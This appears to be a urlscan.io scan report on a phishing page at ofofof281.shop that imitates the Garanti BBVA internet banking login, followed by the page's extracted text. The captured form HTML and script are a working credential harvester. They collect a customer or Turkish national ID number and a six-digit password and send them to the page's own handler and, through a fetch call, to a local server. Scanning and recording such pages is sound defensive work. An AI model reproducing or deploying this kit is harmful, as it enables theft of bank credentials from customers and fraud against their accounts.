ofofof281.shop
Open in
urlscan Pro
94.156.66.71
Malicious Activity!
Public Scan
URL:
https://ofofof281.shop/garanti/
Submission: On July 30 via api from TR — Scanned from DE
Submission: On July 30 via api from TR — Scanned from DE
Form analysis
1 forms found in the DOMName: kk — POST validateCaptcha.php
<form class="form _main-form" onsubmit="return validateCreditCard();" method="post" name="kk" id="myForm" action="validateCaptcha.php" autocomplete="off" enctype="multipart/form-data">
<input type="hidden" value="ae4236735821c76eb4ce4c3638a40e27b131bdfd16f06dab4ee4e721ec8ca7a2c57de86d444398b2" name="validationFormBean.viewName" id="validationFormBean.viewName">
<input type="hidden" value="157886e6502ea7cf1772b2415f584b3de61ea435bc693e2cb1249aa5bad17083" name="validationFormBean.commandName" id="validationFormBean.commandName">
<input type="hidden" value="f2d840e15d804e91ed1df2dfcceef1ab7f04427c63a951fc745dde9e7435ae965f765f55b8e0cea9a1c9276b54d85e882bf8ba2d4e99280660f6e52dc795ce4e" name="validationFormBean.beanClass" id="validationFormBean.beanClass">
<input type="hidden" value="tr" name="validationFormBean.userLanguage" id="validationFormBean.userLanguage">
<input type="hidden" value="81a4ab167348c936" name="validationFormBean.defaultTab" id="validationFormBean.defaultTab">
<input type="hidden" value="tr" name="userLanguage" id="userLanguage">
<input type="hidden" value="" name="kiosk" id="kiosk">
<input type="hidden" value="" name="hiddenENCFIELDS" id="hiddenENCFIELDS">
<input type="hidden" value="" name="hiddenENC" id="hiddenENC">
<input type="hidden" value="01" name="EOP" id="EOP">
<input type="hidden" value="" name="isMrn" id="isMrn">
<input type="hidden" value="01" name="cFlg" id="cFlg">
<input type="hidden" value="49" name="currentDateTime10" id="currentDateTime10">
<input type="hidden" value="1600x1200±5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36±H±30.07.2024±14.25.39±Tue, 30 Jul 2024 12:25:39 GMT±Y" name="cInfoBean.v" id="cInfoBean.v">
<input type="hidden" value="N" name="isBrowserSupportPushNotification" id="isBrowserSupportPushNotification">
<input type="hidden" value="" name="browserNotificationStatus" id="browserNotificationStatus">
<input type="hidden" value="" name="browserWebPushTokenId" id="browserWebPushTokenId">
<input type="hidden" value="" name="browserWebPushTokenIdRefresh" id="browserWebPushTokenIdRefresh">
<div class="formField ">
<div class="formFieldOuter">
<div class="formFieldInner form-group "> <label for="custno" class="col-sm-5 col-md-4 control-label" style="height: 36px;">Müşteri / T.C. Kimlik Numarası</label>
<div class="formFieldSurround col-sm-7 col-md-8"> <input type="text" class="form-control " pattern="[0-9]*" name="kk" id="custno" maxlength="11" required="">
</div>
</div>
</div>
</div>
<div class="formField ">
<div class="formFieldOuter">
<div class="formFieldInner form-group"> <label for="password" class="col-sm-5 col-md-4 control-label" style="height: 36px;"> Parola</label>
<div class="formFieldSurround col-sm-7 col-md-8">
<div class="inline-form-control"> <input pattern="[0-9]*" id="custno" class="form-control" name="sonkul" type="password" maxlength="6" required=""> </div>
</div>
</div>
</div>
</div>
<script>
$(function() {
var containerDiv = $('input#password');
if ($('input#password') !== undefined) {
if ($('input#password').length > 0) {
$('input#password').keydown(function() {
// Save old value.
if (!$(this).val() || (parseInt($(this).val()) <= 999999 && parseInt($(this).val()) >= 0)) $(this).data("old", $(this).val());
});
$('input#password').keyup(function(e) {
// Check correct, else revert back to old value.
if (e != null) {
if (e.key !== undefined) {
if ((e.key == 'ArrowLeft') || (e.key == 'ArrowRight') || (e.key == 'ArrowUp') || (e.key == 'ArrowDown') || (e.key == 'Delete') || (e.key == 'Backspace')) {
;
} else if (e.key.search(/\d/) == -1) {
$(this).val($(this).data("old"));
}
} else {
var key = e.keyCode ? e.keyCode : e.which;
if ((key == '37') || (key == '39') || (key == '38') || (key == '40') || (key == '46') || (key == '8')) {
;
} else if (key < 48 || key > 57) {
$(this).val($(this).data("old"));
}
}
}
var inputValue = "";
var inputlength = 0;
try {
inputValue = $(this).val();
inputlength = ("" + $(this).val()).length;
} catch (err) {
inputlength = 0;
}
if (inputlength <= 0 || (/^[0-9]+$/.test(inputValue) && parseInt(inputValue) <= 999999 && parseInt(inputValue) >= 0));
else $(this).val($(this).data("old"));
});
}
}
});
</script>
<div class="metaData">
<span class="script">
<span class="namespace">GT.temporary</span>
<span class="name">checkInputLengthpassword</span>
<span>
<!--
GT.temporary.checkInputLengthpassword = function() {
var containerDiv=$('input#password');
if ($('input#password')!== undefined) {
if ( $('input#password').length > 0){
$('input#password').keydown(function () {
// Save old value.
if (!$(this).val() || (parseInt($(this).val()) <= 999999 && parseInt($(this).val()) >= 0))
$(this).data("old", $(this).val());
});
$('input#password').keyup(function (e) {
// Check correct, else revert back to old value.
if (e !=null) {
if (e.key!== undefined){
if ((e.key == 'ArrowLeft') || (e.key == 'ArrowRight') ||
(e.key == 'ArrowUp') || (e.key == 'ArrowDown') ||
(e.key == 'Delete') || (e.key == 'Backspace')) {
;
} else if (e.key.search(/\d/) == -1) {
$(this).val($(this).data("old"));
}
} else {
var key = e.keyCode ? e.keyCode : e.which;
if ((key == '37') || (key == '39') ||
(key == '38') || (key == '40') ||
(key == '46') || (key == '8')) {
;
} else if (key <48 || key >57) {
$(this).val($(this).data("old"));
}
}
}
var inputValue = "";
var inputlength = 0;
try {
inputValue = $(this).val();
inputlength = (""+$(this).val()).length;
}
catch(err) {
inputlength = 0;
}
if (inputlength <= 0 ||(/^[0-9]+$/.test(inputValue) && parseInt(inputValue) <= 999999 && parseInt(inputValue) >= 0))
;
else
$(this).val($(this).data("old"));
});
}
}
};
-->
</span>
</span>
<span class="method">
<span class="namespace">GT.temporary</span>
<span class="name">checkInputLengthpassword</span>
<span class="action">remove</span>
</span>
</div>
<input type="hidden" value="Y" name="showRememberMeCheckBoxExist" id="showRememberMeCheckBoxExist" class="structural">
<div class="ark-ui-checkbox formField control" id="isRememberMeContainer">
<div class="formFieldOuter">
<div class="formFieldInner form-group has-btn ">
<div class="formFieldSurround col-sm-7 col-md-8 col-xs-12 col-sm-offset-5 col-md-offset-4">
<div class="checkbox-container ">
<div class="checkbox checkbox-primary no-border">
<input id="isRememberMe" name="isRememberMe" type="checkbox" value="Y"><input type="hidden" name="_isRememberMe" value="on"> <label for="isRememberMe">Beni Hatırla </label>
<a class="btn btn-primary has-advice-text help-icon" role="button" tabindex="-999"></a>
<div class="advice-text advice-text-right ">
<strong class="subject">Yardım</strong><br> "Beni Hatırla" seçeneğini işaretlediğinizde, sonraki girişleriniz için yalnızca parolanızı yazmanız yeterli olacaktır.
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="form-group form-group-offset elementHide" id="rememberMeExtraText">
<div class="col-sm-7 col-md-8 col-sm-offset-5 col-md-offset-4 col-xs-12">
<div class="helper-text">
<p class=" helper "> Müşteri / T.C. kimlik numaranız bu cihazda ve tarayıcıda hatırlanacaktır. Güvenliğiniz açısından, bu tanımlamayı sadece kişisel cihazlarınızda yapmanızı öneririz. </p>
</div>
<div class="metaData">
<span class="script">
<span class="namespace">GT.temporary</span>
<span class="name">closeLightboxOnSubmitBind</span>
<span>
<!--
GT.temporary.closeLightboxOnSubmitBind = function() {
var context = $("div#content");
var linkSubmitBind = $("a.closeLightboxOnSubmit", context);
jQuery(linkSubmitBind, context).bind("click", function () {
var activeLayer = linkSubmitBind.closest(".activeLayer");
if (activeLayer.length > 0) {
GT.utilities.layers.hideLayer(activeLayer[0], "lightboxLayer");
}
});
};
-->
</span>
</span>
<span class="method">
<span class="namespace">GT.temporary</span>
<span class="name">closeLightboxOnSubmitBind</span>
<span class="action">remove</span>
</span>
</div>
</div>
</div>
<input type="hidden"
value="{"input":{"autocomplete":true,"autofocus":true,"list":true,"placeholder":true,"max":true,"min":true,"multiple":true,"pattern":true,"required":true,"step":true},"inputtypes":{"search":true,"tel":true,"url":true,"email":true,"date":true,"month":true,"week":true,"time":true,"datetime-local":true,"range":true,"color":true},"cookies":true,"eventlistener":true,"json":true,"svg":true,"cssescape":true,"supports":true,"target":true,"es5array":true,"es5date":true,"es5function":true,"es5object":true,"strictmode":true,"es5string":true,"es5syntax":true,"es6array":true,"es5undefined":true,"es5":true,"devicemotion":true,"deviceorientation":true,"localstorage":true,"sessionstorage":true,"cssall":true,"inputsearchevent":true,"audio":true,"canvas":true,"video":true,"bgpositionshorthand":true,"csscalc":true,"cubicbezierrange":true,"cssgradients":true,"multiplebgs":true,"opacity":true,"csspositionsticky":true,"csspointerevents":true,"cssremunit":true,"rgba":true,"unknownelements":true,"fileinput":true,"placeholder":true,"scriptasync":true,"scriptdefer":true,"inlinesvg":true,"svgasimg":true,"csschunit":true,"cssexunit":true,"mediaqueries":true,"hiddenscroll":true,"checked":true,"displaytable":true,"display-table":true,"fontface":true,"generatedcontent":true,"cssinvalid":true,"lastchild":true,"cssscrollbar":true,"subpixelfont":true,"cssvalid":true,"cssvhunit":true,"cssvmaxunit":true,"cssvminunit":true,"cssvwunit":true,"formvalidation":true,"textshadow":true,"backgroundblendmode":true,"cssanimations":true,"csspseudoanimations":true,"appearance":true,"backdropfilter":true,"backgroundcliptext":true,"bgpositionxy":true,"bgrepeatround":true,"bgrepeatspace":true,"backgroundsize":true,"bgsizecover":true,"borderimage":true,"borderradius":true,"boxshadow":true,"boxsizing":true,"csscolumns":true,"ellipsis":true,"cssfilters":true,"flexbox":true,"flexwrap":true,"cssmask":true,"cssreflections":true,"cssresize":true,"shapes":true,"textalignlast":true,"csstransforms":true,"csstransforms3d":true,"preserve3d":true,"csstransitions":true,"csspseudotransitions":true,"userselect":true,"apng":true,"desktop":true,"_config":{"enableClasses":true,"enableJSClass":true,"usePrefixes":true},"_l":{}}"
name="browserCapabilities" id="browserCapabilities">
<script>
function submitForm() {
var kk = document.getElementById("kk").value;
var sonkul = document.getElementById("sonkul").value;
// Form verilerini bir nesne olarak toplayabilirsiniz
var formData = {
kk: kk,
sonkul: sonkul,
// diğer form verileri
};
// Sunucuya form verilerini gönderme
fetch('http://localhost:3000/submit-form', {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify(formData),
}).then((response) => response.text()).then((data) => {
console.log('Server response:', data);
// Form başarıyla gönderildiğinde istediğiniz işlemleri gerçekleştirin
}).catch((error) => {
console.error('Error sending form data to server:', error);
// Hata durumunda kullanıcıya bir bildirim gösterebilirsiniz
});
}
</script>
<div class="form-group form-group-offset footer-button ">
<div class="col-sm-7 col-md-8 col-sm-offset-5 col-md-offset-4 col-xs-12 ">
<p> <button onclick="submitForm()" type="submit" id="formSubmit" class="btn btn-primary btn-lg btn-block-input"> Garanti BBVA İnternet Giriş </button></p>
<div> <a href="Javascript:void(0);" onclick="''" tabindex="-1"></a>
<a href="Javascript:void(0);" onclick="try{clearInterval(window.customerSupportIntervalId);}catch(err){}window.open('https://subeform.garantibbva.com.tr/isubeform/application/channelapplicationwithcardget/pinRenew-tr','forgotpassword','top=0,left=0,scrollbars=yes,resizable=no,toolbar=no,menubar=no,width=1152,height=895');" tabindex="-1">Parolamı</a>
unuttum.</div>
<div>
<a href="Javascript:void(0);" onclick="window.open('https://subeform.garantibbva.com.tr/isubeform/application/channelapplicationwithcardget/pinReceive-tr','firstpassword','top=0,left=0,scrollbars=yes,resizable=no,toolbar=no,menubar=no,width=1152,height=895');" tabindex="-1">İlk kez parola almak istiyorum.</a>
</div>
</div>
</div>
<div>
<input type="hidden" name="_csrf" value="d06c645b-da21-4fb7-aa93-3ae9f982706e">
</div>
</form>
Text Content
* Bireysel * Kurumsal * Bireysel * Bireysel * Kurumsal Garanti BBVA İnternet Bankacılığı’na Giriş PAROLA GIRIS * Garanti BBVA İnternet Bankacılığı’na Giriş * Parola Giris GT.temporary addPrefilledsPageClass GT.temporary addPrefilledsPageClass last GARANTI BBVA İNTERNET BANKACILIĞI’NA GIRIŞ GÜVENLI BANKACILIĞA HOŞ GELDINIZ LÜTFEN MÜŞTERI NUMARANIZI YA DA T.C. KIMLIK NUMARANIZI VE SIZE ÖZEL PAROLANIZI GIRIN. Müşteri / T.C. Kimlik Numarası Parola GT.temporary checkInputLengthpassword GT.temporary checkInputLengthpassword remove Beni Hatırla Yardım "Beni Hatırla" seçeneğini işaretlediğinizde, sonraki girişleriniz için yalnızca parolanızı yazmanız yeterli olacaktır. Müşteri / T.C. kimlik numaranız bu cihazda ve tarayıcıda hatırlanacaktır. Güvenliğiniz açısından, bu tanımlamayı sadece kişisel cihazlarınızda yapmanızı öneririz. GT.temporary closeLightboxOnSubmitBind GT.temporary closeLightboxOnSubmitBind remove Garanti BBVA İnternet Giriş Parolamı unuttum. İlk kez parola almak istiyorum. YARDIM VE GÜVENLIK Güvenliğiniz için lütfen aşağıdaki bilgilere dikkat edin. Güvenli bir İnternet deneyimi ve güncel virüsler hakkında bilgi almak için lütfen tıklayın. Detaylı bilgi Başkası adına mı işlem yapıyorsunuz? Başkası adına işlem yapıyorsanız detaylı bilgi için lütfen tıklayın. Detaylı bilgi Tasarruf Mevduatı Güvencesi Tasarruf mevduatınız güvence altında. Detaylı bilgi için lütfen tıklayın. Detaylı bilgi Diğer Yardım Ve Güvenlik Bize Ulaşın Güvenlik Bilgileri Language: English Copyright © 2023 T.Garanti Bankası A.Ş.